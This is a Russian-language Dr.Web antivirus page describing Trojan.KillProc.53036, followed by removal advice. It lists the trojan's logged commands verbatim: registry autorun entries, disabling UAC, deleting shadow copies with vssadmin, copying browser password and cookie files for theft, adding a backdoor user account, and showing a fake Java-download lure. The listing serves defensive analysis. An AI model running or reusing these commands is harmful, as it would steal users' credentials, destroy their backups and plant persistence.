Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.KillProc.53036

Добавлен в вирусную базу Dr.Web: 2017-06-28

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Update' = '%WINDIR%\fpteam.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Skype' = '%WINDIR%\userint.exe'
  • [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%WINDIR%\userint.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'exploer.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'userinit' = 'userint.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Eset' = '%WINDIR%\fpteam.exe'
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
удаляет теневые копии разделов.
Запускает на исполнение:
  • '<SYSTEM32>\cmd.exe' /C for /r "%HOMEPATH%\AppData\" %a in (key3.db) do copy "%a" %WINDIR%\ModsByFp\Mozila\key3.db
  • '<SYSTEM32>\cmd.exe' /C for /r "C:\" %a in (wand.dat) do copy "%a" %WINDIR%\ModsByFp\Opera\wand.dat
  • '<SYSTEM32>\cmd.exe' /C for /r "%HOMEPATH%\AppData\" %a in (signons.sqlite) do copy "%a" %WINDIR%\ModsByFp\Mozila\signons.sqlite
  • '<SYSTEM32>\cmd.exe' /C for /r "%HOMEPATH%\AppData\" %a in (cookies.*) do copy "%a" %WINDIR%\ModsByFp\Chrome\cookies.*
  • '<SYSTEM32>\cmd.exe' /C for /r "%HOMEPATH%\AppData\" %a in (cookies.sqlite) do copy "%a" %WINDIR%\ModsByFp\Mozila\cookies.sqlite
  • '<SYSTEM32>\cmd.exe' /C md %WINDIR%\ModsByFp\Chrome
  • '<SYSTEM32>\cmd.exe' /C md C:\Users\ModsByFp
  • '<SYSTEM32>\msg.exe' * Java error! Download java 11.2 www.ja##.com/ru/download
  • '<SYSTEM32>\cmd.exe' /C md %WINDIR%\SystemUpdate
  • '<SYSTEM32>\cmd.exe' /C md %WINDIR%\ModsByFp\Mozila
  • '<SYSTEM32>\cmd.exe' /C md %WINDIR%\ModsByFp\Opera
  • '<SYSTEM32>\cmd.exe' /C for /r "C:\" %a in (wand.dat) do copy "%a" %WINDIR%\ModsByFp\Opera\wand3.dat
  • '<SYSTEM32>\cmd.exe' /C %WINDIR%\java.exe a -ac -dh -ep1 -m1 -p[gold] -r0 -s -idp %WINDIR%\SystemUpdate\Update %WINDIR%\ModsByFp\*.*
  • '<SYSTEM32>\cmd.exe' /C %WINDIR%\java.exe a -ac -dh -ep1 -m1 -p[gold] -r0 -s -idp %WINDIR%\SystemUpdate\Windows %WINDIR%\ModsByFp\*.*
  • '<SYSTEM32>\cmd.exe' /C %WINDIR%\java.exe a -ac -dh -ep1 -m1 -p[gold] -r0 -s -idp %WINDIR%\SystemUpdate\Stream %WINDIR%\ModsByFp\*.*
  • '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome
  • '<SYSTEM32>\cmd.exe' /C %WINDIR%\java.exe a -ac -dh -ep1 -m1 -p[UPFDNO] -r0 -s -idp %WINDIR%\SystemUpdate\1 %WINDIR%\SystemUpdate\*.*
  • '<SYSTEM32>\cmd.exe' /C start %WINDIR%\Launch.exe /Stext %WINDIR%\ModsByFp\Chrome\guardv2NW.txt
  • '<SYSTEM32>\cmd.exe' /C copy %HOMEPATH%\AppData\Local\Google\Chrome\"User Data"\Default\"Login Data" %WINDIR%\ModsByFp\Chrome\"Login Data"
  • '<SYSTEM32>\cmd.exe' /C for /r "C:\" %a in (cookies4.dat) do copy "%a" %WINDIR%\ModsByFp\Opera\cookies4.dat
  • '<SYSTEM32>\cmd.exe' /C copy %HOMEPATH%\AppData\Local\Google\Chrome\"User Data"\Default\"Web Data" %WINDIR%\ModsByFp\Chrome\"Web Data"
  • '<SYSTEM32>\cmd.exe' /C copy %HOMEPATH%\AppData\Roaming\Opera\wand.dat %WINDIR%\ModsByFp\Opera\wand2.dat
  • '<SYSTEM32>\cmd.exe' /C copy %HOMEPATH%\AppData\Roaming\Opera\Opera\wand.dat %WINDIR%\ModsByFp\Opera\wand.dat
  • '<SYSTEM32>\cmd.exe' /C HKEY_local_machine\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /t reg_sz /d "userint.exe" /f
  • '<SYSTEM32>\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "exploer.exe" /f
  • '<SYSTEM32>\cmd.exe' /C net user %username% cnbvkbwtypbz
  • '<SYSTEM32>\cmd.exe' /k <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\cmd.exe' /C net user skype - ze1f.pro /add
  • '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t reg_sz /d "%WINDIR%\userint.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_local_machine\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /t reg_sz /d "userint.exe" /f
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "exploer.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Eset" /t REG_SZ /d "%WINDIR%\fpteam.exe" /f
  • '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Skype /t REG_SZ /d "%WINDIR%\userint.exe" /f
  • '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /t REG_SZ /d "%WINDIR%\fpteam.exe" /f
  • '<SYSTEM32>\net.exe' user skype - ze1f.pro /add
  • '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /For=H: /Quiet
  • '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /For=R: /Quiet
  • '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /For=E: /Quiet
  • '<SYSTEM32>\cmd.exe' /C start http://www.ja##.com/ru/download/
  • '<SYSTEM32>\cmd.exe' /C msg * Java error! Download java 11.2 www.ja##.com/ru/download
  • '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /For=D: /Quiet
  • '<SYSTEM32>\net.exe' user %USERNAME% cnbvkbwtypbz
  • '<SYSTEM32>\net1.exe' user skype - ze1f.pro /add
  • '<SYSTEM32>\cmd.exe' /C vssadmin delete shadows /For=C: /Quiet
  • '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\net1.exe' user %USERNAME% cnbvkbwtypbz
Изменения в файловой системе:
Создает следующие файлы:
  • %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\download[1]
Сетевая активность:
Подключается к:
  • 'www.ja##.com':80
  • 'localhost':1039
  • '94.##0.191.201':587
TCP:
Запросы HTTP GET:
  • http://www.ja##.com/ru/download/
UDP:
  • DNS ASK www.ja##.com
  • DNS ASK sm##.mail.ru
Другое:
Ищет следующие окна:
  • ClassName: 'MS_AutodialMonitor' WindowName: ''
  • ClassName: 'MS_WebcheckMonitor' WindowName: ''
  • ClassName: 'IEFrame' WindowName: ''
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: '' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке